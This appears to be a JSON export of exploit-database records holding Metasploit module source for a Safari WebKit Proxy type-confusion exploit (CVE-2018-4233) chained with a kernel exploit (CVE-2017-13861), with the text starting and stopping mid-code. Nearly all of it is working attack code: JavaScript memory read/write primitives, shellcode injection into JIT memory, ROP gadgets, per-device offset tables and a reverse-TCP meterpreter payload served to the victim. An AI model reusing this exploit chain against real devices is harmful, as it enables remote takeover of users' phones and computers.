Int64([ \n00, 0x10, 00, 00, // m_structureID \n0x0, // m_indexingType \n0x2b, // m_type \n0x08, // m_flags \n0x1 // m_cellState \n]); \n \nvar container = { \njsCellHeader: jsCellHeader.asJSValue(), \nbutterfly: null, \nvector: float64MemView, \nlength: (new Int64('0x0001000000001337')).asJSValue(), \nmode: {}, // an empty object, we'll need that later \n}; \n \n// Leak address and inject fake object \n// RawAddr == address in float64 form \nvar containerRawAddr = addrofOnce(container); \nvar fakeArrayAddr = Add(Int64.fromDouble(containerRawAddr), 16); \nprint(\"[+] Fake Float64Array @ \" + fakeArrayAddr); \n \n/// \n/// BEGIN CRITICAL SECTION \n/// \n/// Objects are corrupted, a GC would now crash the process. \n/// We'll try to repair everything as quickly as possible and with a minimal amount of memory allocations. \n/// \nvar driver = fakeobjOnce(fakeArrayAddr.asDouble()); \nwhile (!(driver instanceof Float64Array)) { \njsCellHeader.assignAdd(jsCellHeader, Int64.One); \ncontainer.jsCellHeader = jsCellHeader.asJSValue(); \n} \n \n// Get some addresses that we'll need to repair our objects. We'll abuse the .mode \n// property of the container to leak addresses. \ndriver[2] = containerRawAddr; \nvar emptyObjectRawAddr = float64MemView[6]; \ncontainer.mode = referenceFloat64Array; \nvar referenceFloat64ArrayRawAddr = float64MemView[6]; \n \n// Fixup the JSCell header of the container to make it look like an empty object. \n// By default, JSObjects have an inline capacity of 6, enough to hold the fake Float64Array. \ndriver[2] = emptyObjectRawAddr; \nvar header = float64MemView[0]; \ndriver[2] = containerRawAddr; \nfloat64MemView[0] = header; \n \n// Copy the JSCell header from an existing Float64Array and set the butterfly to zero. \n// Also set the mode: make it look like an OversizeTypedArray for easy GC survival \n// (see JSGenericTypedArrayView<Adaptor>::visitChildren). \ndriver[2] = referenceFloat64ArrayRawAddr; \nvar header = float64MemView[0]; \nvar length = float64MemView[3]; \nvar mode = float64MemView[4]; \ndriver[2] = containerRawAddr; \nfloat64MemView[2] = header; \nfloat64MemView[3] = 0; \nfloat64MemView[5] = length; \nfloat64MemView[6] = mode; \n \n// Root the container object so it isn't garbage collected. \n// This will allocate a butterfly for the fake object and store a reference to the container there. \n// The fake array itself is rooted by the memory object (closures). \ndriver.container = container; \n \n/// \n/// END CRITICAL SECTION \n/// \n/// Objects are repaired, we will now survive a GC \n/// \nif (typeof(gc) !== 'undefined') \ngc(); \n \nmemory = { \nread: function(addr, length) { \ndriver[2] = memory.addrof(uint8MemView).asDouble(); \nfloat64MemView[2] = addr.asDouble(); \nvar a = new Array(length); \nfor (var i = 0; i < length; i++) \na[i] = uint8MemView[i]; \nreturn a; \n}, \n \nwrite: function(addr, data) { \ndriver[2] = memory.addrof(uint8MemView).asDouble(); \nfloat64MemView[2] = addr.asDouble(); \nfor (var i = 0; i < data.length; i++) \nuint8MemView[i] = data[i]; \n}, \n \nread8: function(addr) { \ndriver[2] = addr.asDouble(); \nreturn Int64.fromDouble(float64MemView[0]); \n}, \n \nwrite8: function(addr, value) { \ndriver[2] = addr.asDouble(); \nfloat64MemView[0] = value.asDouble(); \n}, \n \naddrof: function(obj) { \nfloat64MemView.leakme = obj; \nvar butterfly = Int64.fromDouble(driver[1]); \nreturn memory.read8(Sub(butterfly, 0x10)); \n}, \n}; \n \nprint(\"[+] Got stable memory read/write!\"); \n \n// Find binary base \nvar funcAddr = memory.addrof(Math.sin); \nvar executableAddr = memory.read8(Add(funcAddr, 24)); \nvar codeAddr = memory.read8(Add(executableAddr, 24)); \nvar vtabAddr = memory.read8(codeAddr); \nvar jscBaseUnaligned = Sub(vtabAddr, JSC_VTAB_OFFSET); \nprint(\"[*] JavaScriptCore.dylib @ \" + jscBaseUnaligned); \nvar jscBase = And(jscBaseUnaligned, new Int64(\"0x7ffffffff000\")); \nprint(\"[*] JavaScriptCore.dylib @ \" + jscBase); \n \nvar dyldStubLoaderAddr = memory.read8(jscBase); \nvar dyldBase = Sub(dyldStubLoaderAddr, DYLD_STUB_LOADER_OFFSET); \nvar strlenAddr = memory.read8(Add(jscBase, STRLEN_GOT_OFFSET)); \nvar libCBase = Sub(strlenAddr, STRLEN_OFFSET); \nprint(\"[*] dyld.dylib @ \" + dyldBase); \nprint(\"[*] libsystem_c.dylib @ \" + libCBase); \n \nvar confstrAddr = Add(libCBase, CONFSTR_OFFSET); \nprint(\"[*] confstr @ \" + confstrAddr); \nvar dlopenAddr = Add(dyldBase, DLOPEN_OFFSET); \nprint(\"[*] dlopen @ \" + dlopenAddr); \n \n// Patching shellcode \nvar stage2Addr = memory.addrof(stage2); \nstage2Addr = memory.read8(Add(stage2Addr, 16)); \nprint(\"[*] Stage 2 payload @ \" + stage2Addr); \n \nstage1.replace(new Int64(\"0x4141414141414141\"), confstrAddr); \nstage1.replace(new Int64(\"0x4242424242424242\"), stage2Addr); \nstage1.replace(new Int64(\"0x4343434343434343\"), new Int64(stage2.length)); \nstage1.replace(new Int64(\"0x4444444444444444\"), dlopenAddr); \nprint(\"[+] Shellcode patched\"); \n \n// Leak JITCode pointer poison value \nvar poison_addr = Add(jscBase, 305152); \nprint(\"[*] Poison value @ \" + poison_addr); \nvar poison = memory.read8(poison_addr); \nprint(\"[*] Poison value: \" + poison); \n \n// Shellcode \nvar func = makeJITCompiledFunction(); \nvar funcAddr = memory.addrof(func); \nprint(\"[+] Shellcode function object @ \" + funcAddr); \nvar executableAddr = memory.read8(Add(funcAddr, 24)); \nprint(\"[+] Executable instance @ \" + executableAddr); \nvar jitCodeAddr = memory.read8(Add(executableAddr, 24)); \nprint(\"[+] JITCode instance @ \" + jitCodeAddr); \n \nvar codeAddrPoisoned = memory.read8(Add(jitCodeAddr, 32)); \nvar codeAddr = Xor(codeAddrPoisoned, poison); \nprint(\"[+] RWX memory @ \" + codeAddr.toString()); \nprint(\"[+] Writing shellcode...\"); \nvar origCode = memory.read(codeAddr, stage1.length); \nmemory.write(codeAddr, stage1); \n \nprint(\"[!] Jumping into shellcode...\"); \nvar res = func(); \nif (res === 0) { \nprint(\"[+] Shellcode executed sucessfully!\"); \n} else { \nprint(\"[-] Shellcode failed to execute: error \" + res); \n} \n \nmemory.write(codeAddr, origCode); \nprint(\"[*] Restored previous JIT code\"); \n \nprint(\"[+] We are done here, continuing WebContent process as if nothing happened =)\"); \nif (typeof(gc) !== 'undefined') \ngc(); \n} \n \nready.then(function() { \ntry { \npwn(); \n} catch (e) { \nprint(\"[-] Exception caught: \" + e); \n} \n}).catch(function(err) { \nprint(\"[-] Initializatin failed\"); \n}); \n \n</script> \n</body> \n</html> \n^ \nunless datastore['DEBUG_EXPLOIT'] \nhtml.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') \nend \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/150779/safari_proxy_object_type_confusion.rb.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-02T20:33:44", "description": "", "cvss3": {}, "published": "2019-06-02T00:00:00", "type": "packetstorm", "title": "Safari Webkit Proxy Object Type Confusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-4233", "CVE-2017-13861"], "modified": "2019-06-02T00:00:00", "id": "PACKETSTORM:153148", "href": "https://packetstormsecurity.com/files/153148/Safari-Webkit-Proxy-Object-Type-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Safari Webkit Proxy Object Type Confusion', \n'Description' => %q{ \nThis module exploits a type confusion bug in the Javascript Proxy object in \nWebKit. The DFG JIT does not take into account that, through the use of a Proxy, \nit is possible to run arbitrary JS code during the execution of a CreateThis \noperation. This makes it possible to change the structure of e.g. an argument \nwithout causing a bailout, leading to a type confusion (CVE-2018-4233). \n \nThe type confusion leads to the ability to allocate fake Javascript objects, \nas well as the ability to find the address in memory of a Javascript object. \nThis allows us to construct a fake JSCell object that can be used to read \nand write arbitrary memory from Javascript. The module then uses a ROP chain \nto write the first stage shellcode into executable memory within the Safari \nprocess and kick off its execution. \n \nThe first stage maps the second stage macho (containing CVE-2017-13861) into \nexecutable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake \nexploit leads to a kernel task port (TFP0) that can read and write arbitrary \nkernel memory. The processes credential and sandbox structure in the kernel \nis overwritten and the meterpreter payloads code signature hash is added to \nthe kernels trust cache, allowing Safari to load and execute the (self-signed) \nmeterpreter payload. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'saelo', \n'niklasb', \n'Ian Beer', \n'siguza', \n], \n'References' => [ \n['CVE', '2018-4233'], \n['CVE', '2017-13861'], \n['URL', 'https://github.com/saelo/cve-2018-4233'], \n['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'], \n['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'], \n['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'], \n], \n'Arch' => ARCH_AARCH64, \n'Platform' => 'apple_ios', \n'DefaultTarget' => 0, \n'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' }, \n'Targets' => [[ 'Automatic', {} ]], \n'DisclosureDate' => 'Mar 15 2018')) \nregister_advanced_options([ \nOptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]), \nOptBool.new('DUMP_OFFSETS', [false, \"Show newly found offsets in a javascript prompt\", false]), \n]) \nend \n \ndef exploit_data(directory, file) \npath = ::File.join Msf::Config.data_directory, 'exploits', directory, file \n::File.binread path \nend \n \ndef payload_url \n\"tcp://#{datastore[\"LHOST\"]}:#{datastore[\"LPORT\"]}\" \nend \n \ndef get_version(user_agent) \nif user_agent =~ /OS (.*?) like Mac OS X\\)/ \nios_version = Gem::Version.new($1.gsub(\"_\", \".\")) \nreturn ios_version \nend \nfail_with Failure::NotVulnerable, 'Target is not vulnerable' \nend \n \ndef on_request_uri(cli, request) \nif request.uri =~ %r{/apple-touch-icon*} \nreturn \nelsif request.uri =~ %r{/favicon*} \nreturn \nelsif request.uri =~ %r{/payload10$*} \npayload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib_sha1 \nsend_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'}) \nprint_good(\"Sent sha1 iOS 10 payload\") \nreturn \nelsif request.uri =~ %r{/payload11$*} \npayload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib \nsend_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'}) \nprint_good(\"Sent sha256 iOS 11 payload\") \nreturn \nend \n \nuser_agent = request['User-Agent'] \nprint_status(\"Requesting #{request.uri} from #{user_agent}\") \nversion = get_version(user_agent) \nios_11 = (version >= Gem::Version.new('11.0.0')) \nif request.uri =~ %r{/exploit$} \nloader_data = exploit_data('CVE-2017-13861', 'exploit') \nsrvhost = Rex::Socket.resolv_nbo_i(srvhost_addr) \nconfig = [srvhost, srvport].pack(\"Nn\") + payload_url \npayload_url_index = loader_data.index('PAYLOAD_URL') \nloader_data[payload_url_index, config.length] = config \nprint_good(\"Sent async_wake exploit\") \nsend_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'}) \nreturn \nend \n \nget_mem_rw_ios_10 = %Q^ \nfunction get_mem_rw(stage1) { \nvar structs = []; \nfunction sprayStructures() { \nfunction randomString() { \nreturn Math.random().toString(36).replace(/[\\^a-z]+/g, \"\").substr(0, 5) \n} \nfor (var i = 0; i < 4096; i++) { \nvar a = new Float64Array(1); \na[randomString()] = 1337; \nstructs.push(a) \n} \n} \nsprayStructures(); \nvar hax = new Uint8Array(4096); \nvar jsCellHeader = new Int64([0, 16, 0, 0, 0, 39, 24, 1]); \nvar container = { \njsCellHeader: jsCellHeader.asJSValue(), \nbutterfly: false, \nvector: hax, \nlengthAndFlags: (new Int64(\"0x0001000000000010\")).asJSValue() \n}; \nvar address = Add(stage1.addrof(container), 16); \nvar fakearray = stage1.fakeobj(address); \nwhile (!(fakearray instanceof Float64Array)) { \njsCellHeader.assignAdd(jsCellHeader, Int64.One); \ncontainer.jsCellHeader = jsCellHeader.asJSValue() \n} \nmemory = { \nread: function(addr, length) { \nfakearray[2] = i2f(addr); \nvar a = new Array(length); \nfor (var i = 0; i < length; i++) a[i] = hax[i]; \nreturn a \n}, \nreadInt64: function(addr) { \nreturn new Int64(this.read(addr, 8)) \n}, \nwrite: function(addr, data) { \nfakearray[2] = i2f(addr); \nfor (var i = 0; i < data.length; i++) hax[i] = data[i] \n}, \nwriteInt64: function(addr, val) { \nreturn this.write(addr, val.bytes()) \n}, \n}; \nvar empty = {}; \nvar header = memory.read(stage1.addrof(empty), 8); \nmemory.write(stage1.addrof(container), header); \nvar f64array = new Float64Array(8); \nheader = memory.read(stage1.addrof(f64array), 16); \nmemory.write(stage1.addrof(fakearray), header); \nmemory.write(Add(stage1.addrof(fakearray), 24), [16, 0, 0, 0, 1, 0, 0, 0]); \nfakearray.container = container; \nreturn memory; \n} \n^ \n \nget_mem_rw_ios_11 = %Q^ \nfunction get_mem_rw(stage1) { \nvar FPO = typeof(SharedArrayBuffer) === 'undefined' ? 0x18 : 0x10; \nvar structure_spray = [] \nfor (var i = 0; i < 1000; ++i) { \nvar ary = {a:1,b:2,c:3,d:4,e:5,f:6,g:0xfffffff} \nary['prop'+i] = 1 \nstructure_spray.push(ary) \n} \nvar manager = structure_spray[500] \nvar leak_addr = stage1.addrof(manager) \n//print('leaking from: '+ hex(leak_addr)) \nfunction alloc_above_manager(expr) { \nvar res \ndo { \nfor (var i = 0; i < ALLOCS; ++i) { \nstructure_spray.push(eval(expr)) \n} \nres = eval(expr) \n} while (stage1.addrof(res) < leak_addr) \nreturn res \n} \nvar unboxed_size = 100 \nvar unboxed = alloc_above_manager('[' + '13.37,'.repeat(unboxed_size) + ']') \nvar boxed = alloc_above_manager('[{}]') \nvar victim = alloc_above_manager('[]') \n// Will be stored out-of-line at butterfly - 0x10 \nvictim.p0 = 0x1337 \nfunction victim_write(val) { \nvictim.p0 = val \n} \nfunction victim_read() { \nreturn victim.p0 \n} \ni32[0] = 0x200 // Structure ID \ni32[1] = 0x01082007 - 0x10000 // Fake JSCell metadata, adjusted for boxing \nvar outer = { \np0: 0, // Padding, so that the rest of inline properties are 16-byte aligned \np1: f64[0], \np2: manager, \np3: 0xfffffff, // Butterfly indexing mask \n} \nvar fake_addr = stage1.addrof(outer) + FPO + 0x8; \n//print('fake obj @ ' + hex(fake_addr)) \nvar unboxed_addr = stage1.addrof(unboxed) \nvar boxed_addr = stage1.addrof(boxed) \nvar victim_addr = stage1.addrof(victim) \n//print('leak ' + hex(leak_addr) \n//+ ' unboxed ' + hex(unboxed_addr) \n//+ ' boxed ' + hex(boxed_addr) \n//+ ' victim ' + hex(victim_addr)) \nvar holder = {fake: {}} \nholder.fake = stage1.fakeobj(fake_addr) \n// From here on GC would be uncool \n// Share a butterfly for easier boxing/unboxing \nvar shared_butterfly = f2i(holder.fake[(unboxed_addr + 8 - leak_addr) / 8]) \nvar boxed_butterfly = holder.fake[(boxed_addr + 8 - leak_addr) / 8] \nholder.fake[(boxed_addr + 8 - leak_addr) / 8] = i2f(shared_butterfly) \nvar victim_butterfly = holder.fake[(victim_addr + 8 - leak_addr) / 8] \nfunction set_victim_addr(where) { \nholder.fake[(victim_addr + 8 - leak_addr) / 8] = i2f(where + 0x10) \n} \nfunction reset_victim_addr() { \nholder.fake[(victim_addr + 8 - leak_addr) / 8] = victim_butterfly \n} \nvar stage2 = { \naddrof: function(victim) { \nboxed[0] = victim \nreturn f2i(unboxed[0]) \n}, \nfakeobj: function(addr) { \nunboxed[0] = i2f(addr) \nreturn boxed[0] \n}, \nwrite64: function(where, what) { \nset_victim_addr(where) \nvictim_write(this.fakeobj(what)) \nreset_victim_addr() \n}, \nread64: function(where) { \nset_victim_addr(where) \nvar res = this.addrof(victim_read()) \nreset_victim_addr() \nreturn res; \n}, \nwrite_non_zero: function(where, values) { \nfor (var i = 0; i < values.length; ++i) { \nif (values[i] != 0) \nthis.write64(where + i*8, values[i]) \n} \n}, \nreadInt64: function(where) { \nif (where instanceof Int64) { \nwhere = Add(where, 0x10); \nholder.fake[(victim_addr + 8 - leak_addr) / 8] = where.asDouble(); \n} else { \nset_victim_addr(where); \n} \nboxed[0] = victim_read(); \nvar res = f2i(unboxed[0]); \nreset_victim_addr(); \nreturn new Int64(res); \n}, \nread: function(addr, length) { \nvar address = new Int64(addr); \nvar a = new Array(length); \nvar i; \n \nfor (i = 0; i + 8 < length; i += 8) { \nv = this.readInt64(Add(address, i)).bytes() \nfor (var j = 0; j < 8; j++) { \na[i+j] = v[j]; \n} \n} \n \nv = this.readInt64(Add(address, i)).bytes() \nfor (var j = i; j < length; j++) { \na[j] = v[j - i]; \n} \n \nreturn a \n}, \ntest: function() { \nthis.write64(boxed_addr + 0x10, 0xfff) // Overwrite index mask, no biggie \nif (0xfff != this.read64(boxed_addr + 0x10)) { \nfail(2) \n} \n}, \n} \n// Test read/write \nstage2.test() \nreturn stage2; \n} \n^ \n \nget_mem_rw = (version >= Gem::Version.new('11.2.2')) ? get_mem_rw_ios_11 : get_mem_rw_ios_10 \nutils = exploit_data \"CVE-2018-4233\", \"utils.js\" \nint64 = exploit_data \"CVE-2018-4233\", \"int64.js\" \ndump_offsets = '' \nif datastore['DUMP_OFFSETS'] \ndump_offsets = %Q^ \nvar offsetstr = uuid + \" : { \"; \nvar offsetarray = [ \"_dlsym\", \"_dlopen\", \"__longjmp\", \"regloader\", \"dispatch\", \"stackloader\", \"movx4\", \"ldrx8\", \"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\", \"__platform_memmove\", \n\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\", \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\", \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\", ]; \nfor (var i = 0; i < offsetarray.length; i++) { \nvar offset = offsets[offsetarray[i]]; \nif (offset) { \nvar offsethex = Sub(offset, cache_slide).toString().replace(\"0x0000000\", \"0x\"); \noffsetstr += \"\\\\\"\" + offsetarray[i] + \"\\\\\" : \" + offsethex + \", \"; \n} \n} \noffsetstr += \"}, \"; \nprompt(\"offsets: \", offsetstr); \n^ \nend \n \nhtml = %Q^ \n<html> \n<body> \n<script> \n \n#{utils} \n#{int64} \n \nprint = alert; \nITERS = 1E4; \nALLOCS = 1E3; \n \nvar conversion_buffer = new ArrayBuffer(8); \nvar f64 = new Float64Array(conversion_buffer); \nvar i32 = new Uint32Array(conversion_buffer); \nvar BASE32 = 0x100000000; \n \nfunction f2i(f) { \nf64[0] = f; \nreturn i32[0] + BASE32 * i32[1]; \n} \n \nfunction i2f(i) { \ni32[0] = i % BASE32; \ni32[1] = i / BASE32; \nreturn f64[0]; \n} \n \nfunction hexit(x) { \nif (x instanceof Int64) return x.toString(); \nif (x < 0) return \"-\" + hex(-x); \nreturn \"0x\" + x.toString(16); \n} \n \nfunction fail(x) { \nprint('FAIL ' + x); \nlocation.reload(); \nthrow null; \n} \n \ncounter = 0; \n \n// CVE-2018-4233 \nfunction trigger(constr, modify, res, val) { \nreturn eval(` \nvar o = [13.37] \nvar Constructor${counter} = function(o) { ${constr} } \nvar hack = false \nvar Wrapper = new Proxy(Constructor${counter}, { \nget: function() { \nif (hack) { \n${modify} \n} \n} \n}) \nfor (var i = 0; i < ITERS; ++i) \nnew Wrapper(o) \nhack = true \nvar bar = new Wrapper(o) \n${res} \n`) \n} \n \nvar workbuf = new ArrayBuffer(0x1000000); \nvar payload = new Uint8Array(workbuf); \n \nfunction pwn() { \nvar stage1 = { \naddrof: function(victim) { \nreturn f2i(trigger(\"this.result = o[0]\", \"o[0] = val\", \"bar.result\", victim)) \n}, \nfakeobj: function(addr) { \nreturn trigger(\"o[0] = val\", \"o[0] = {}\", \"o[0]\", i2f(addr)) \n}, \ntest: function() { \nvar addr = this.addrof({ \na: 4919 \n}); \nvar x = this.fakeobj(addr); \nif (x.a != 4919) fail(\"stage1\") \n} \n}; \nstage1.test(); \n \nvar stage2 = get_mem_rw(stage1); \nvar FPO = #{ios_11 ? \"(typeof(SharedArrayBuffer) === 'undefined') ? 0x20 : 0x18;\" : \"0x18;\"} \nvar memory = stage2; \nmemory.u32 = _u32; \n \nvar wrapper = document.createElement(\"div\"); \nvar wrapper_addr = stage1.addrof(wrapper); \nvar el_addr = memory.readInt64(wrapper_addr + FPO); \nvar vtab = memory.readInt64(el_addr); \n \nvar anchor = memory.readInt64(vtab); \nvar hdr = Sub(anchor, anchor.lo() & 0xfff); \nvar b = []; \nwhile(true) \n{ \nif (memory.readInt64(hdr).lo() == 4277009104) { \nfail('WebCore ' + hdr + ' post spectre support coming soon'); \n} \nif(strcmp(memory.read(hdr, 0x10), \"dyld_v1 arm64\")) \n{ \nbreak; \n} \nhdr = Sub(hdr, 0x1000); \n} \n \nvar base_seg = null; \nvar nsegs = memory.u32(Add(hdr, 0x14)); \nvar segdata = memory.read(Add(hdr, memory.u32(Add(hdr, 0x10))), nsegs * 0x20); \nvar segs = []; \nfor(var i = 0; i < nsegs; ++i) \n{ \nvar off = i * 0x20; \nvar seg = \n{ \naddr: new Int64(segdata.slice(off + 0x0, off + 0x8)), \nsize: new Int64(segdata.slice(off + 0x8, off + 0x10)), \nfileoff: new Int64(segdata.slice(off + 0x10, off + 0x18)), \nmaxprot: b2u32(segdata.slice(off + 0x18, off + 0x1c)), \ninitprot: b2u32(segdata.slice(off + 0x1c, off + 0x20)) \n}; \nsegs.push(seg); \nif(seg.fileoff.hi() == 0 && seg.fileoff.lo() == 0 && (seg.size.hi() != 0 || seg.size.lo() != 0)) \n{ \nbase_seg = seg; \n} \n} \nif(base_seg == null) \n{ \nfail(\"base_seg\"); \n} \n \nvar cache_slide = Sub(hdr, base_seg.addr); \nvar uuid = memory.readInt64(Add(hdr, 0x58)).lo(); \nvar offset_cache = { \n// iPod Touch 10.1.1 \n788795426 : { \"_dlsym\" : 0x18052ddd8, \"_dlopen\" : 0x18052dd10, \"__longjmp\" : 0x1806ffb78, \"regloader\" : 0x180f0622c, \"dispatch\" : 0x180d7e058, \"stackloader\" : 0x18099a8e8, \"_mach_task_self_\" : 0x1a586e3bc, \n\"__kernelrpc_mach_vm_protect_trap\" : 0x1806240a4, \"__platform_memmove\" : 0x1806ffe00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a457c438, }, \n \n// iPhone 5S 10.2.1 \n3432281541 : { \"_dlsym\" : 0x18052edd8, \"_dlopen\" : 0x18052ed10, \"__longjmp\" : 0x180700b78, \"regloader\" : 0x180f07230, \"dispatch\" : 0x180d7f05c, \"stackloader\" : 0x18099b8ec, \"mach_task_self\" : 0x1a6da23bc, \n\"__kernelrpc_mach_vm_protect_trap\" : 0x1806250c0, \"__platform_memmove\" : 0x180700e00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a5a0d438, }, \n \n// iPhone 6S 11.0.3 \n425478416 : { \"_dlsym\" : 0x180587574, \"_dlopen\" : 0x180587460, \"__longjmp\" : 0x1807bd7dc, \"regloader\" : 0x180051ad8, \"dispatch\" : 0x19b323a4c, \"stackloader\" : 0x19b2e6f40, \"movx4\" : 0x19b33305c, \n\"ldrx8\" : 0x180060028, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1b15d8a00, \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\" : 0x1b15d8a08, \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\" : 0x1b15d89f8, }, \n}; \n \nvar offsets = offset_cache[uuid]; \nif (offsets) \n{ \nvar k = Object.keys(offsets); \nfor(var i = 0; i < k.length; ++i) \n{ \nvar s = k[i]; \noffsets[s] = Add(offsets[s], cache_slide); \n} \n} \nelse \n{ \nvar syms = {}; \nvar gadgets = {}; \n \nfor(var i = 0; i < segs.length; ++i) \n{ \nsegs[i].addr = Add(segs[i].addr, cache_slide); \n} \nvar libs = \n{ \n\"/usr/lib/system/libdyld.dylib\": [\"_dlsym\", \"_dlopen\"], \n#{ ios_11 ? ' \n\"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"], \n\"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\"], \n' : ' \n\"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\", \"__platform_memmove\"], \n\"/usr/lib/system/libsystem_kernel.dylib\": [\"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\"], \n\"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"], \n'} \n} \n \n#{ ios_11 ? ' \nvar opcodes = { \n// ldr x8, [sp] ; str x8, [x19] ; ldp x29, x30, [sp, #0x20] ; ldp x20, x19, [sp, #0x10] ; add sp, sp, #0x30 ; ret \n\"ldrx8\": [ [0xf94003e8, 0xf9000268, 0xa9427bfd, 0xa9414ff4, 0x9100c3ff, 0xd65f03c0] ], \n// blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret \n\"dispatch\": [ [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ] ], \n// mov x3, x22 ; mov x6, x27 ; mov x0, x24 ; mov x1, x19 ; mov x2, x23 ; ldr x4, [sp] ; blr x8 \n\"regloader\": [ [ 0xaa1603e3, 0xaa1b03e6, 0xaa1803e0, 0xaa1303e1, 0xaa1703e2, 0xf94003e4, 0xd63f0100 ] ], \n// ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30]; \n// ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret \n\"stackloader\": [ [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ] ], \n// mov x4, x20 ; blr x8 \n\"movx4\": [ [ 0xaa1403e4, 0xd63f0100 ] ], \n} \nvar opcode_libs = [ \n\"/usr/lib/PN548.dylib\", // dispatch, stackloader \n\"/usr/lib/libc++.1.dylib\", // ldrx8, regloader, movx4, stackloader \n]; \n \n' : ' \nvar opcodes = { \n// mov x0, x23; mov x1, x22; mov x2, x24; mov x3, x25; mov x4, x26; mov x5, x27; blr x28 \n\"regloader\": [ [ 0xaa1703e0, 0xaa1603e1, 0xaa1803e2, 0xaa1903e3, 0xaa1a03e4, 0xaa1b03e5, 0xd63f0380 ] ], \n\"dispatch\": [ \n// blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret \n[ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ], \n// blr x21; sub sp, x29, 0x20; ldp x29, x30, [sp, 0x20]; ldp x20, x19, [sp, 0x10]; ldp x22, x21, [sp], 0x30; ret \n[ 0xd63f02a0, 0xd10083bf, 0xa9427bfd, 0xa9414ff4, 0xa8c357f6, 0xd65f03c0 ], \n], \n\"stackloader\": [ \n// ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30]; \n// ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret \n[ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ], \n// sub sp, x29, 0x50; ldp x29, x30, [sp, 0x50]; ldp x20, x19, [sp, 0x40]; ldp x22, x21, [sp, 0x30]; \n// ldp x24, x23, [sp, 0x20]; ldp x26, x25, [sp, 0x10]; ldp x28, x27, [sp], 0x60; ret \n[ 0xd10143bf, 0xa9457bfd, 0xa9444ff4, 0xa94357f6, 0xa9425ff8, 0xa94167fa, 0xa8c66ffc, 0xd65f03c0 ], \n], \n}; \n \nvar opcode_libs = [ \"/usr/lib/libLLVM.dylib\" ]; \n'} \n \nvar imgs = Add(hdr, memory.u32(Add(hdr, 0x18))); \nvar nimgs = memory.u32(Add(hdr, 0x1c)); \nfor(var i = 0; i < nimgs; ++i) \n{ \nvar straddr = off2addr(segs, memory.u32(Add(imgs, i * 0x20 + 0x18))); \nvar fn = function(i) \n{ \nreturn memory.read(Add(straddr, i), 1)[0]; \n}; \nvar base = Add(memory.readInt64(Add(imgs, i * 0x20)), cache_slide); \nif(opcode_libs.some(lib => strcmp(fn, lib))) \n{ \nvar ncmds = memory.u32(Add(base, 0x10)); \nfor(var j = 0, off = 0x20; j < ncmds; ++j) \n{ \nvar cmd = memory.u32(Add(base, off)); \nif(cmd == 0x19 && strcmp(memory.read(Add(base, off + 0x8), 0x10), \"__TEXT\")) // LC_SEGMENT_64 \n{ \nvar nsects = memory.u32(Add(base, off + 0x40)); \nfor(var k = 0, o = off + 0x48; k < nsects; ++k) \n{ \nif(strcmp(memory.read(Add(base, o), 0x10), \"__text\")) \n{ \nvar keys = 